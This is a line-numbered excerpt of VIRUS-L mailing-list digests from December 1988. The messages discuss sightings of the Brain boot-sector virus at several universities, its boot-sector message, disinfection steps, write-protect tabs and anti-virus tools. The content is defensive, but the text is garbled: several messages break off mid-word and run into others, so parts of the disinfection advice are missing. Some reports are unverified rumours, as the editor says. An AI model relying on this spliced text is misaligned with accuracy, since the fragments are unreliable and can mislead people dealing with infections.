  3936. The origional Pakastani Brain has several properties.
  3937. 1.  The infection vector is a trap in the boot block.  Brain only
  3938.     activates when an infected diskette is booted.
  3939. 2.  The origonal Brain only infects 5.25 inch floppies.  It has specific
  3940.     checks that permit it to aviod 3.5 inch floppies and hard disks.
  3941.  
  3942. A recent report suggested that Brain came as a no charge extra with a
  3943. commercial word processor.  Unless the victim tried to boot a diskette
  3944. from the vendor the origional brain could not have infected the
  3945. victims diskettes.
  3946.  
  3947. If there is a "Brain injector" out there I would like to have that
  3948. verified.  It would change the rules of the game.
  3949.  
  3950. If there is a version of Brain that infects hard disks I would like to
  3951. have that verified as well.
  3952.  
  3953. In a similar vein, there has been an incredible report of V.22 bis
  3954. modems serving as a carrier for a hostile agent program.  Since a V.22
  3955. bis modem is a computer it would be helpful for someone with a clear
  3956. understanding of V.22 bis and the common implementations to comment on
  3957. the likelihood of risk from this quarter.
  3958.  
  3959.  
  3960. [Ed. I would think that a good "moral to the story" is that one should
  3961. not jump to conclusions; that only perpetuates rumors.  It would be
  3962. premature to place too much faith in either report until they can be
  3963. verified, or at least until a further description, which is accurate
  3964. in technical details, is offered.]
  3965.  
  3966. ------------------------------
  3967.  
  3968. Date:         Thu, 15 Dec 88 10:29:41 EST
  3969. From:         Naama Zahavi-Ely <ELINZE@YALEVM.BITNET>
  3970. Subject:      Details on Brain virus at Yale (PC)
  3971.  
  3972. Two days ago we discovered at Yale several diskettes infected with the
  3973. Brain virus.  The version we have contains in its boot sector the
  3974. following text:
  3975.  
  3976. Welcome to the Dungeon (c) 1986 Brain & Amjads (pvt) Ltd VIRUS_SHOE
  3977. RECORD v9.0 Dedicated to the dynamic memories of millions of virus who
  3978. are no longer with us today - Thank GOODNESS!!  BEWARE OF THE er VIRUS
  3979. : \this program is catching program follows after these messeges
  3980.  
  3981. The infected diskettes also had their volume name set to (c) Brain.
  3982.  
  3983. This variant of Brain seems to create a hidden file on the diskette,
  3984. with 0 bytes, and each of the infected diskettes has 3072 bytes in bad
  3985. sectors.  For all we know, the user may have had infected diskettes
  3986. for a very long time -- we discovered the infection while trying to
  3987. solve an unrelated WordPerfect problem.  Luckily all our public
  3988. diskettess are write-protected.
  3989.  
  3990. Now the questions: can this virus infect hard disks under any
  3991. circumstances?  How do systems (RAM) become infected -- at start-up
  3992. only, or otherwise?  How do other disks become infected: when
  3993. formatted, written to, soft-booted?  What is the most trouble-free way
  3994. of getting rid of it?  I suggested formatting a new diskette on a
  3995. clean system, copying the files over, then re-formatting the infected
  3996. diskette -- would that work?  Are there any dangers involved with this
  3997. virus, other than the 3 bad sectors mentioned above?  I have seen
  3998. recommendations of DEBRAIN, but I am afraid it might give people a
  3999. false sense of security against viruses in general, so if the
  4000. reformatting method mentioned above would work, I would rather use it
  4001. - -- but I would welcome any opinions to the contrary.
  4002.  
  4003. Please send to me or to the list any helpful hints you can think of --
  4004. any information would be appreciated!
  4005.  
  4006. Thanks,
  4007. Naama
  4008.  
  4009. + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- +
  4010. |  Naama Zahavi-Ely                                                    |
  4011. |  Project ELI                           E-MAIL ELINZE@YALEVM.BITNET   |
  4012. |  Yale Computer Center                                                |
  4013. |  175 Whitney Ave                                                     |
  4014. |  New Haven, CT 06520                                                 |
  4015. |  (203) 432-6600 ext. 341                                             |
  4016. + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- +
  4017.  
  4018. ------------------------------
  4019.  
  4020. Date: Thu, 15 Dec 1988 16:26:34 EST
  4021. From: Ken van Wyk <luken@spot.CC.Lehigh.EDU>
  4022. Subject: generic undigestifier
  4023.  
  4024. Thanks to Jeff Ogata for sending in a generic undigestifier written in
  4025. C.  It appears to be very standard C and compiled as-is on our Sun.
  4026. It should compile with most C compilers including WATERLOO C on IBM
  4027. VM/370 machines.  The program does the following:
  4028.  
  4029. 1) read in (via stdin) a file containing a VIRUS-L digest.
  4030. 2) output individual files (digest.1, digest.2, ...), each containing
  4031.    one message.
  4032. 3) output a file (digest.contents) containing the table of contents
  4033.    for that message.
  4034.  
  4035. It can also extract a specific message number from a digest.  I'll
  4036. make this program available from our LISTSERV in the near future.
  4037.  
  4038. A couple other people have also volunteered to send in undigestifying
  4039. programs, and there is apparently one available for anonymous FTP from
  4040. SIMTEL-20.ARMY.MIL in the PD1:<MSDOS.C> directory.  Thanks to everyone
  4041. who sent me info, etc.!
  4042.  
  4043. One person who offered to put together a small program asked what kind
  4044. of functionality would be best.  That made me realize that I should've
  4045. specified something from the beginning...  I don't want to sound
  4046. ungrateful to Jeff and the others who've helped; we already have a lot
  4047. more now than what we started with!  But, let me point out what I'd
  4048. consider to be an ideal undigestifier for the average digest reader
  4049. (any digest, not just VIRUS-L).
  4050.  
  4051. An ideal undigestifier would read in table of contents of a digest and
  4052. display it on the screen.  Then, it would allow the user to point at
  4053. one or more individual messages and view, extract, print, or perhaps
  4054. even invoke a text editor to generate a reply file suitable for
  4055. merging into the local mail system.
  4056.  
  4057. Thanks again to Jeff and the others!  I hope this doesn't sound as
  4058. though your efforts aren't appreciated.
  4059.  
  4060. Any comments or suggestions?
  4061.  
  4062. Ken
  4063.  
  4064. ------------------------------
  4065.  
  4066. End of VIRUS-L Digest
  4067. *********************
  4068. VIRUS-L Digest              Friday, 16 Dec 1988         Volume 1 : Issue 49
  4069.  
  4070. Today's Topics:
  4071. Request for comments on public anti-virus programs (PC)
  4072.  
  4073. ---------------------------------------------------------------------------
  4074.  
  4075. Date:     Thu, 15 Dec 88 21:44 EST
  4076. From:     <MATHAIMT@VTCC1.BITNET>
  4077. Subject:  Request for comments on public anti-virus programs (PC)
  4078.  
  4079. I got the following anti-virus programs from the LISTSERV@LEHIIBM1 :
  4080. 1. dprot102
  4081. 2. trapdisk
  4082. Can any one who has used these programs tell me if they have any
  4083. advantages over Flushot+ 1.4. From the documentation, I can't seem to
  4084. tell if they do any more. Any other comments about these two programs
  4085. would be welcome.  Please suggest some other useful programs for the
  4086. IBM PC and sources to get them from.
  4087.  
  4088. (I have flushot+ 1.4, debrain 1.4 and checkup 1.8, and have read Y.
  4089. Radai's comments ovirus (though de-brain seems to have
  4090. gotten rid of it) and am worried about future encounters !
  4091.  
  4092. Thanks.
  4093.  
  4094. Mathew Mathai
  4095. - -----------------------
  4096. Virginia Tech         |
  4097. Bitnet : mathai@vtcc1 |
  4098. - ----------------------
  4099.  
  4100. ------------------------------
  4101.  
  4102. End of VIRUS-L Digest
  4103. *********************VIRUS-L Digest              Friday, 16 Dec 1988         Volume 1 : Issue 50
  4104.  
  4105. Today's Topics:
  4106. Report of Scores Author
  4107. Is there someplace that all the information is kept??
  4108. Common sense re: software suppliers
  4109. Brain Virus at Yale (PC)
  4110. Re: Brain virus at Yale (PC)
  4111. What does the Brain virus do? (PC)
  4112. Brain at U of Vermont (PC) -- forwarded msg from LIAISON list
  4113. VIRUS WARNING: Brain virus at Univ. of Vermont (PC)
  4114.  
  4115. ---------------------------------------------------------------------------
  4116.  
  4117. Date: Fri, 16 Dec 88 09:17:50 EST
  4118. From: Don Alvarez <boomer@space.mit.edu>
  4119. Subject: Report of Scores Author
  4120.  
  4121.     The Rumor Manager in the latest issue of MacUser claims
  4122.     that Apple has known the author of the Scores Virus for
  4123.     "several months" now, and that the matter is in the hands
  4124.     of their lawyers.
  4125.  
  4126.                 ....And on the 8th day, the Lord
  4127.                     created civil suits....
  4128.  
  4129.                     - Don
  4130.  
  4131.      + ----------------------------------------------------------- +
  4132.      |   Don Alvarez               MIT Center For Space Research   |
  4133.      |   boomer@SPACE.MIT.EDU      77 Massachusetts Ave   37-618   |
  4134.      |   (617) 253-7457            Cambridge, MA 02139             |
  4135.      + ----------------------------------------------------------- +
  4136.  
  4137. ------------------------------
  4138.  
  4139. Date:    Fri, 16 Dec 88 09:42 EST
  4140. From:     <JEB107@PSUVM.BITNET>
  4141. Subject: Is there someplace that all the information is kept??
  4142.  
  4143. It occured to me today that I have heard many requests for essentially
  4144. the same thing : "What is such and such virus, how does it work, what
  4145. does it infect, and how can I protect against it?"  It would seem to
  4146. me that these requests become repetitive, and that the people with the
  4147. answers must be getting sick of sending replies in time after time.
  4148.  
  4149. A letter posted a few days ago comes to mind : Someone asking if there
  4150. was a master file with descriptions of all known viruses for the IBM
  4151. Pc and the Mac.  My question is, Is there?  Such a file would prevent
  4152. a lot of hassles, and perhaps at the beginning of each week the digest
  4153. could print the location of such files and any recent updates that
  4154. have been added.
  4155.  
  4156. Now I realize this is asking a lot of the list owner.  As if he
  4157. doesn't have enough to do already.  But perhaps it is time someone
  4158. else jumped into the fray, and compiled such a list.  I am sure that
  4159. there are many 'experts' who would be willing to write information for
  4160. such a file, it would just be a matter of editing it together.
  4161.  
  4162. Or perhaps this has already been done, and I don't know about it.  And
  4163. that is just as bad - if it exists everyone should know where to get
  4164. it, even me.
  4165.  
  4166.  
  4167. Jon Baker           JEB107 at PSUVM.Bitnet
  4168.                               Psuvm.Psu.Edu
  4169.  
  4170. Disclamer : I would do it myself, but I am not the most knowledgable
  4171. person in terms of viruses.  I would most certainly make a mess of
  4172. it....
  4173.  
  4174. [Ed. The closest existing thing (that I know of) to what you propose
  4175. is the Dirty Dozen list.  I don't know how up to date that is, though,
  4176. as I don't have a recent copy.  Any volunteers to send me that and/or
  4177. other such lists so that I can post them on the LISTSERV?]
  4178.  
  4179. ------------------------------
  4180.  
  4181. Date:        16 December 88, 16:46:22 +0100 (MEZ)
  4182. From:        Otto Stolz         +49 7531 88 2645     RZOTTO   at DKNKURZ1
  4183. Subject:     Common sense re: software suppliers
  4184.  
  4185. > CHRISTMA EXEC *did* come from a trustworthy supplier!
  4186.  
  4187. I did not say "don't run programs you haven't got from a trustworthy
  4188. supplier", I rather said "programs you have *ordered* from a
  4189. trustworthy supplier".  As CHRISTMA EXEC has shown, extreme care is
  4190. approprate for programs you are supplied with for no obvious reason.
  4191.  
  4192. > Even shrink-wrapped software from a multi-million dollar corporation
  4193. > cannot be considered as coming from a trustworthy supplier
  4194.  
  4195. You are right insofar that even they are not infallable.  However, you
  4196. can be sure that they will undertake every possible attempt to
  4197. minimize impact on their customers (they will suffer great losses if
  4198. they won't succeed).  At least you know whom to sue for lost property
  4199. :-)
  4200.  
  4201. > If you mean not to run any program you can't read and understand *even*
  4202. > if from a trustworthy supplier, then you've just killed the n many cases.  That's the reason, computer-users & media are so upset
  4203. about viruses & other malicious software (I mean software doing real
  4204. harm, e.g.  anihilating programs or valuable data -- not just
  4205. spreading and saying "You've got a Virus", every April fool's day):
  4206. This kind of malice shakes our society to its very foundations; it
  4207. resembles offering toxic or rotten food in a restaurant, or loosening
  4208. bolts at the steering assembly of other people's cars.  However, a
  4209. certain amount of caution can be expected from the customer's side:
  4210. you probably would not go out to a dirty restaurant, and you would ask
  4211. everybody (even your friends) what they were doing under your car, if
  4212. you catched them working there and hadn't asked them for help.  My
  4213. recent note meant to establish this sort of common sense for receiving
  4214. and running programs, now we all have heared of possible virus
  4215. carriers.
  4216.  
  4217. > Sometimes even the people writing the software do not understand all of
  4218. > it.
  4219.  
  4220. Then, t have to live with incompetence in every trade :-)
  4221.  
  4222. Nevertheless, best wishes to everybody
  4223.                                        Otto
  4224.  
  4225. ------------------------------
  4226.  
  4227. Date:         Fri, 16 Dec 88 10:50 EST
  4228. From:         Don Kazem <DKAZEM@NAS.BITNET>
  4229. Subject:      Brain Virus at Yale (PC)
  4230.  
  4231.           In reference to the message from Naama Zahavi-Ely about the
  4232.           Brain Virus, it seems that this is a different version of
  4233.           the Brain virus than the one I have seen.  Since last summer
  4234.           we have been studying the virus issue and trying to come up
  4235.           with countermeasures to protect our evironment.
  4236.  
  4237.           Few Months ago I did obtain a disk that had been
  4238.           contaminated with the Brain Virus, and used Norton Utilities
  4239.           to look at the whole disk; sector by sector.
  4240.  
  4241.           The message that was embeded in that disk was similar to the
  4242.           one that Naama had mentioned, but not execatly the same.
  4243.  
  4244.           I found that same machine and performed a warm boot, the new
  4245.           disk also became infected. Nothing short of turning the
  4246.           machine off and then back on was safe enough.
  4247.  
  4248.           Don Kazem-Zadeh
  4249.           National Academy of Sciences
  4250.           DKAZEM@NAS.BITNET
  4251.  
  4252. ------------------------------
  4253.  
  4254. Date:         Fri, 16 Dec 88 11:44:14 EST
  4255. From:         Naama Zahavi-Ely <ELINZE@YALEVM.BITNET>
  4256. Subject:      Re: Brain virus at Yale (PC)
  4257.  
  4258. Hello Virus-l folk,
  4259.  
  4260. The following is a note I sent to user support personnel at Yale
  4261. following the discovery of a few diskettes infected with the Brain
  4262. virus, all belonging to one user.  I would appreciate any comment, and
  4263. especially any correction!  Feel free to plagiarize, anybody who has
  4264. the need -- just make sure you check for corrections in the next few
  4265. issues of VIRUS-L.  I do not claim any extensive knowledge of viruses!
  4266.  
  4267. Thanks,
  4268. Naama
  4269. - -------
  4270. Hello everybody!
  4271.  
  4272. Three days ago we discovered at Yale several diskettes infoes not infect network drives.
  4273.  
  4274. How can you tell that a diskette is infected:
  4275.  
  4276. 1) Boot the computer from a clean DOS diskette or from a hard disk (this is
  4277.    important!).
  4278. 2) Use the Norton Utilities, or some other software that lets you look at disk
  4279.    sectors (like DWALK from PCSOFT), and look at the boot sector.  If the disk
  4280.    is infected, you'll see the following text:
  4281.  
  4282. Welcome to the Dungeon (c) 1986 Brain & Amjads (pvt) Ltd VIRUS_SHOE
  4283. RECORD v9.0 Dedicated to the dynamic memories of millions of virus who
  4284. are no longer with us today - Thank GOODNESS!!  BEWARE OF THE er VIRUS
  4285. : \this program is catching program follows after these messeges
  4286.  
  4287. Note: if you boot from an infected diskette and thus have an infected
  4288. system, any attemp to read the boot sector seems to be diverted and
  4289. display the correct boot sector (which is kept elsewhere on the
  4290. diskette in a sector marked as bad), and you would not be able to see
  4291. the above text!  So make sure you boot from a clean systte,
  4292. with 0 bytes, and each of the infected diskettes has 3072 bytes in
  4293. "bad" sectors.
  4294.  
  4295. For all we know, the user may have had infected diskettes for a long
  4296. time - we discovered the infection while trying to solve an unrelated
  4297. WordPerfect problem.  Luckily all our public diskettes are
  4298. write-protected.
  4299.  
  4300. How to get rid of the virus:
  4301.  
  4302. 1) Cold-boot the computer from a clean DOS disk with a write-protect tab.
  4303. 2) Format a new diskette.
  4304. 3) Copy the files from the infected diskette to the new diskette.  Do NOT use
  4305.    the DISKCOPY command -- use COPY *.* (this virus is a boot sector virus and
  4306.    will not get copied).
  4307. 4) Cold-boot the computer again from the clean DOS disk.
  4308. 5) Re-format the infected diskette.  It should now be safe for use.
  4309.  
  4310. This virus is a boot-sector virus -- meaning that it infects a
  4311. computer's memory (for the session) only if the computer is booted
  4312. from an infected diskette.  Otherwise, even if the diskettes are
  4313. infected, the computer is not and the viruy booting from an infected
  4314. diskette), then ANY disk activity with a 5.25" diskette will infect
  4315. the diskette -- even a simple DIR command.  If your DIR commands
  4316. suddenly start taking longer than usual, check your system. Of course,
  4317. the virus cannot write past a write-protect tab, so if you use them
  4318. you are safe even on other people's systems.
  4319.  
  4320. I do NOT think this warrants VIRUS ALARM notices all over the place --
  4321. students have other things to worry about this time of the year!  The
  4322. worst that can happen is that some diskettes will get infected, and
  4323. this would mean only that 6 sectors on the diskette would get
  4324. overwritten and marked as bad.  Even this can easily be avoided with
  4325. minimal safe computing habits: always boot from your own
  4326. write-protected diskette, and do not share diskettes promiscuously.
  4327. If you lend a diskette to somebody else (to copy a file, etc), put a
  4328. write-protect tab on it.  This is all there is to it!
  4329.  
  4330. Please let me know of any sightings, and I'll be CK@UCI.BITNET>
  4331. Subject: What does the Brain virus do? (PC)
  4332.  
  4333. A student recently brought in a disk contaminated with the Brain
  4334. virus.  I confiscated the disk, and gave her a clean one in exchange.
  4335. I'm hoping that this was an isolated incident, but just in case it
  4336. wasn't, I'd like to know what the Brain virus does.
  4337.  
  4338. Thanks in advance.
  4339.  
  4340. ====================================================================
  4341. Bob Hudack
  4342. Microcomputer Services Group
  4343. Computing Facility
  4344. University of California, Irvine       RJHUDACK@UCI.BITNET
  4345.  
  4346. ------------------------------
  4347.  
  4348. Resent-From:  Naama Zahavi-Ely <ELINZE@YALEVM.BITNET>
  4349. Subject:      Brain at U of Vermont (PC) -- forwarded msg from LIAISON list
  4350. Date:         Fri, 16 Dec 88 11:33:44 EST
  4351. From:         Anne Chetham-Strode <ACS@UVMVM>
  4352.  
  4353. Forwarded from the LISTSERV group, Network Sites Liaison
  4354. (LIAISON@MARIST):
  4355.  
  4356. We have discovered the Pakistani BRAIN virus on 5 1/4" disks in our
  4357. public microcomputer labs.  The most recent versions ofhis particular strain.
  4358.  
  4359. We would like to disassemble the virus and write our own software to
  4360. sanitize disks.  I would appreciate suggestions from readers about
  4361. about which disassembler to use and where to get it.  Also, I would
  4362. appreciate hearing from readers who have experience disassembling
  4363. viruses.  Please respond to me directly, ACS at UVMVM on BITNET.
  4364.  
  4365. Thank you,
  4366. Anne Chetham-Strode
  4367. Microcomputer Systems Analyst
  4368. University Computing Services
  4369. University of Vermont
  4370. Burlington, VT 05405
  4371.  
  4372. ------------------------------
  4373.  
  4374. Date:         Fri, 16 Dec 88 13:37:52 EST
  4375. Sender:       Virus Alert List <VALERT-L@IBM1.CC.Lehigh.Edu>
  4376. From:         Ken van Wyk <luken@SPOT.CC.LEHIGH.EDU>
  4377. Subject:      VIRUS WARNING: Brain virus at Univ. of Vermont (PC)
  4378.  
  4379. I just got another report of the Brain virus - this time at the
  4380. University of Vermont.  Will this thing never die?!  Here are the
  4381. details:
  4382.  
  4383.  
  4384. Date:         Fri, 16 Dec 88 11:35:15 EST
  4385. From:         Steve Cavrak <SJC@UVMVM.B
  4386. On December 13th, we discovered a copy of the Brain virus on a
  4387. diskette at the University of Vermont.  A quick survey of the
  4388. various labs at the University (using DEBUG or the Norton utilities)
  4389. revealed that the virus had spread to most laboratories --- we've just
  4390. finished the fall semester and lab use was at an all time high.
  4391.  
  4392. The brain strain found at UVM identifies itself with the following
  4393. message in sector 0:
  4394.  
  4395. /----------------------------------------------------------------------\
  4396.  
  4397.         Welcome to the Dungeon
  4398.  (c)  1986 Basit & Amjad (pvt) Ltd.             BRAIN COMPUTER SERVICES
  4399. .730 NIZAM BLOCK ALLAMA IQBAL TOWN               LABORE-PAKISTAN..PHONE
  4400. :430791,443248,280530.      Beware of this VIRUS......Contact us for
  4401. accination.......
  4402.                                      <u<end-file-marker> ....
  4403.  
  4404. \----------------------------------------------------------------------/
  4405.  
  4406.  
  4407. At this point, we've replaced all boot disks in the labs, trained
  4408. our consultant staff as well as other lab managers on disinfection
  4409. procedures, written a disinfection brochure, and are preparing a
  4410. mailing for all PC owners on campus.
  4411.  
  4412. We're currently reverse engineering the virus to get a better
  4413. handle on its behavior so that when students return in January
  4414. we can handle the onslaught.    (By the way, do you have a good
  4415. disassembler that you can recommend.)
  4416.  
  4417. A check of a batch of diskettes with the DEBRAIN program shows that
  4418. although the first 3 sectors of BRAIN match expectations, other
  4419. sections may be different.  Some of our users have MS-DOS 3.2 and
  4420. have found that the that DEBRAIN doesn't correctly recognize the
  4421. newer DOS messages.
  4422.  
  4423.  
  4424. NOTE:  Just as I post this, we've come across one disk with the
  4425. BRAIN message reading "Welcome to the fungeon."   Now wasn't that
  4426. clever of the little beast.
  4427.  
  4428. ------------------------------
  4429.  
  4430. End of VIRUS-L Digest
  4431. *********************VIRUS-L Digest              Monday, 19 Dec 1988         Volume 1 : Issue 51
  4432.  
  4433. Today's Topics:
  4434. Trapdisk (PC)
  4435. Re: Write protected disk written, etc. (PC & general)
  4436. Debrain.C (PC)
  4437. low level format for PC/XT
  4438. Confusion about the Brain virus. (PC)
  4439. Brain Virus (PC)
  4440. How safe are write-protect tabs? (PC)
  4441. Common sense re: software suppliers
  4442.  
  4443. ---------------------------------------------------------------------------
  4444.  
  4445. Date: Fri, 16 Dec 88 13:59:46 -0800
  4446. From: Steve Clancy <SLCLANCY@UCI.BITNET>
  4447. Subject: Trapdisk (PC)
  4448.  
  4449. I have used Trapdisk in the past and am very pleased with it.
  4450. Trapdisk is a newer version of something that used to be called BOMB.
  4451. I like it because it allows a command line, such as TRAPDISK WF as a
  4452. command to write protect your disk against a write or format.  I also
  4453. like being able to disable it at will (TRAPDISK U), but I do not like
  4454. that it remains memory resident.  There is also another very good
  4455. program called HDSENTRY.
  4456.  
  4457. I'm afraid that I cannot comment on how well either handle
  4458. sophisticated attempts to get around their protection.
  4459.  
  4460. - -- Steve
  4461.  
  4462. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  4463. |   Steve Clancy                      |  WELLSPRING RBBS            |
  4464. |   Biomedical Library                |  714-856-7996  24 HRS       |
  4465. |   P.O. Box 19556                    |  300-9600 N,8,1             |
  4466. |   University of California, Irvine  |  714-856-5087  nites/wkends |
  4467. |   Irvine, CA  92713                 |  300-1200 N,8,1             |
  4468. |                                     |                             |
  4469. |   SLCLANCY@UCI                      |  "Are we having fun yet?"   |
  4470. |   SLCLANCY@ORION.CF.UCI.EDU         |                             |
  4471. |                                     |                             |
  4472. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  4473.  
  4474. ------------------------------
  4475.  
  4476. Date:         Fri, 16 Dec 88 21:25:07 EST
  4477. From:         "Homer W. Smith" <CTM@CORNELLC.BITNET>
  4478. Subject:      Re: Write protected disk written, etc. (PC & general)
  4479.  
  4480. >          I found that if I booted a machine with an infected disk,
  4481. >          and then put a new clean boot disk WITH A WRITE PROTECT
  4482. >          TAB in the same machine and performed a warm boot, the new
  4483. >          disk also became infected. Nothing short of turning the
  4484. >          machine off and then back on was safe enough.
  4485.  
  4486.      How can a disk with a write tab on it become infected?
  4487.  
  4488.      As some of you know I run a small home company called ART MATRIX.
  4489. We produce and sell many items related to fractals like videos and
  4490. slide sets etc.  We also offer program disk on IBM 5" disks that have
  4491. nothing but fortran source code, no system, no nothing but ascii
  4492. files.  I presume these disks are ABSOLUTELY SAFE in ALL
  4493. CIRCUMSTANCES.
  4494.  
  4495.      We have for a long time been considering selling a MAC disk that
  4496. would introduce the user to fractals that was written in Forth and was
  4497. highly interactive and very much executable code.  With all this virus
  4498. stuff going around I have had to have second thoughts.
  4499.  
  4500.      For one, ART MATRIX is not a corporation and has no corporate veil
  4501. to hide behind in case of litigation.  We are a partnership and
  4502. and law suit could ruin me personally.
  4503.  
  4504.      From what I can see, there is no absolutely safe way to guarantee
  4505. that the disks I send out are virus free, and no safe way to prove
  4506. they WERE virus free if they should later become infected.
  4507.  
  4508.      Thus what on EARTH would motivate me to produce this disk
  4509. and risk my LIFE selling it to a world wide audience.  We have
  4510. many people clamoring for this disk, but now with the news
  4511. that fresh disks from reputable factories have viruses, I just
  4512. cant see my way to getting into the business.
  4513.  
  4514.      1.)  Who is legally liable for a virus if a new disk bought by a
  4515. customer has one?  How does one prove that one did one's best to
  4516. insure the disk was virus free?  Does it matter that one did one's
  4517. best or is it always the manufacturer's fault?
  4518.  
  4519.      2.)  Should I produce the disk?
  4520.  
  4521.      3.)  What is going to happen to the software industry as a whole?
  4522.  
  4523. ------------------------------
  4524.  
  4525. Date:     Sat, 17 Dec 88 00:03 EDT
  4526. From:     Paul Coen <PCOEN@DRUNIVAC.BITNET>
  4527. Subject:  Debrain.C (PC)
  4528.  
  4529.         I received a copy of debrain.c some time ago, and I finally
  4530. got around to attempting to compile it (Turbo C).  Basically, it
  4531. wouldn't compile, I was getting syntax errors (particularly on the \
  4532. character in the code).  I don't know C, so I'm having some trouble
  4533. figuring out what's wrong.  The version of Turbo C I got from our
  4534. software library is 1.0, could that have something to do with it?  Any
  4535. help would be appreciated.  Oh, and just to keep all of you
  4536. happy....this is for the IBM PC/XT/AT and compatables.  With the Brain
  4537. virus popping up right and left all of a sudden, I'd feel more
  4538. comfortable with a running copy of this around.
  4539.         Side note: We've got about a 1.1 to 1 computer to student
  4540. ratio here, and we've yet to get hit with any kind of a virus.  I'm
  4541. keeping my fingers crossed!
  4542.  
  4543. +----------------------------------------------------------------------------+
  4544. | Paul R. Coen    Student Operator, Drew University Academic Computer Center |
  4545. |   Bitnet: PCOEN@DRUNIVAC       U.S. Snail:  Drew University CM Box 392,    |
  4546. |           PCOEN@DREW                        Madison, NJ 07940              |
  4547. |   Disclaimer:  I represent my own reality.                                 |
  4548. +----------------------------------------------------------------------------+
  4549.  
  4550. ------------------------------
  4551.  
  4552. Date:         Sat, 17 Dec 88 06:55:29 EST
  4553. From:         "Homer W. Smith" <CTM@CORNELLC.BITNET>
  4554. Subject:      low level format for PC/XT
  4555.  
  4556.      Again I want to thank all who offered help on low level
  4557. formats of my PC/XT hard drive.
  4558.  
  4559.      Nearly everyone mentioned the debug  g=c800:5  but on my
  4560. machine this produces nothing.  How do I find the correct
  4561. starting address for my machine.  How do I find out what kind
  4562. of disk drive is in it?  By taking off the cover and looking
  4563. at it?
  4564.  
  4565.      There seems to be some confusion about what the format command
  4566. does.  Some say it erases only the FAT entries which as good as makes
  4567. the data on the disk unusable.  The manual seems to imply that the
  4568. data on the disk is actually erased.  If it is not erasing the data
  4569. why does it take so long?
  4570.  
  4571.      What real danger is there to doing just a format in terms
  4572. of leaving virus remanants behind?
  4573.  
  4574. ------------------------------
  4575.  
  4576. Date:     Sat, 17 Dec 88 12:10 EST
  4577. From:     <MATHAIMT@VTCC1.BITNET>
  4578. Subject:  Confusion about the Brain virus. (PC)
  4579.  
  4580. This concerns the discussion about the Brain virus in the VIRUS-L digest.
  4581.  
  4582. >          I found that if I booted a machine with an infected disk,
  4583. >          and then put a new clean boot disk WITH A WRITE PROTECT
  4584. >          TAB in the same machine and performed a warm boot, the new
  4585. >          disk also became infected. Nothing short of turning the
  4586. >          machine off and then back on was safe enough.
  4587.  
  4588. When I found some of my 5.25" floppies infected with the Brain virus,
  4589. some folks at the labs and computing center told me that a
  4590. write-protected disk couldn't get infected because the
  4591. write-protection mechanism was "hardware controlled" and couldn't be
  4592. circumvented by any software. So I was confused when I read the lines
  4593. (above) because the information given to me by the lab operators is
  4594. wrong and it is possible to bypass "write-protection" using software.
  4595. Could some one please explain
  4596.  
  4597. 1. Why a warm boot by itself is not enough to prevent the spread of
  4598. infection
  4599. 2. How a write-protected boot disk could get infected during warm boot.
  4600.  
  4601. This could be very helpful to a lot of us (the PC user community at
  4602. Virginia Tech) who don't know too much about the operation of Viruses.
  4603. Thanks in advance.
  4604.  
  4605. - -Mathew Mathai
  4606. - ----------------------
  4607. Virginia Tech          |
  4608. Bitnet : mathai@vtcc1  |
  4609. - ----------------------
  4610.  
  4611. ------------------------------
  4612.  
  4613. Date:         Sun, 18 Dec 88 12:45:46 EDT
  4614. From:         <SSAT@PACEVM.BITNET>
  4615. Subject:      Brain Virus (PC)
  4616.  
  4617. Ok here is what I did. I formatted 7 brand new disks fresh out of the
  4618. box from a copy of DOS I know is clean and secure. I checked the 0,0
  4619. on the disk to be s ure BRAIN WAS NOT HIDING THERE.  I then unwrapped
  4620. the word processing program and follwed the instructions to in stall
  4621. the program onto the floppy disks.  I then checked the 7 disks and
  4622. found the BRAIN logo on 0,0 which is where it is know to hide, on all
  4623. of the disks.  So, perhaps you can tell me where else it could have
  4624. come from if not direct fr om the manufacturer's disks?
  4625.  
  4626. I will not publish the name of the manufacturer (because we know those
  4627. people in Utah can get testy sometimes) but I have answered all
  4628. private requests for the companies name.
  4629.  
  4630. [Ed. Fair enough...]
  4631.  
  4632. ------------------------------
  4633.  
  4634. Date:         Sun, 18 Dec 88 15:07:42 EST
  4635. From:         Naama Zahavi-Ely <ELINZE@YALEVM.BITNET>
  4636. Subject:      How safe are write-protect tabs? (PC)
  4637.  
  4638. Hello!
  4639.  
  4640. A non-expert question: how secure are write-protect tabs against
  4641. viruses?  Are write-protect tabs based on hardware (ie the drive will
  4642. not write on a disk with a write-protect tab on, no matter what)?  Or
  4643. is it simply a matter of an error code, which might be disregarded by
  4644. a clever virus?  It is well known that file write-protection is easily
  4645. circumvented by viruses; it is also well-known that viruses can
  4646. prevent a write-protection error code from being displayed after
  4647. trying to write to a tab-write-protected diskette.  Can a virus
  4648. actually write to a tab-write-protected diskette?  There has been a
  4649. report recently on Virus-L of an infection of a write-protected
  4650. diskette -- unfortunatly without any details.  Since I, and I am sure
  4651. many others, used to regard write-protect tabs as completely secure
  4652. (as long as they are left on!), I would appreciate very much any
  4653. information to the contrary.
  4654.  
  4655. Thanks and have a good holiday period!
  4656.  
  4657. Naama
  4658.  
  4659.  
  4660. + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- +
  4661. |  Naama Zahavi-Ely                                                    |
  4662. |  Project ELI                           E-MAIL ELINZE@YALEVM.BITNET   |
  4663. |  Yale Computer Center                                                |
  4664. |  175 Whitney Ave                                                     |
  4665. |  New Haven, CT 06520                                                 |
  4666. |  (203) 432-6600 ext. 341                                             |
  4667. + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- +
  4668.  
  4669. ------------------------------
  4670.  
  4671. From: portal!cup.portal.com!dan-hankins@Sun.COM
  4672. Date: Sun, 18-Dec-88 12:49:30 PST
  4673. Subject: Common sense re: software suppliers
  4674.  
  4675. In article <16 December 88, 16:46:22> <RZOTTO at DKNKURZ1> Otto Stolz
  4676. writes:
  4677.  
  4678. >You are right insofar that even they are not infallable.  However, you
  4679. >can be sure that they will undertake every possible attempt to
  4680. >minimize impact on their customers (they will suffer great losses if
  4681. >they won't succeed).  At least you know whom to sue for lost property
  4682. >:-)
  4683.  
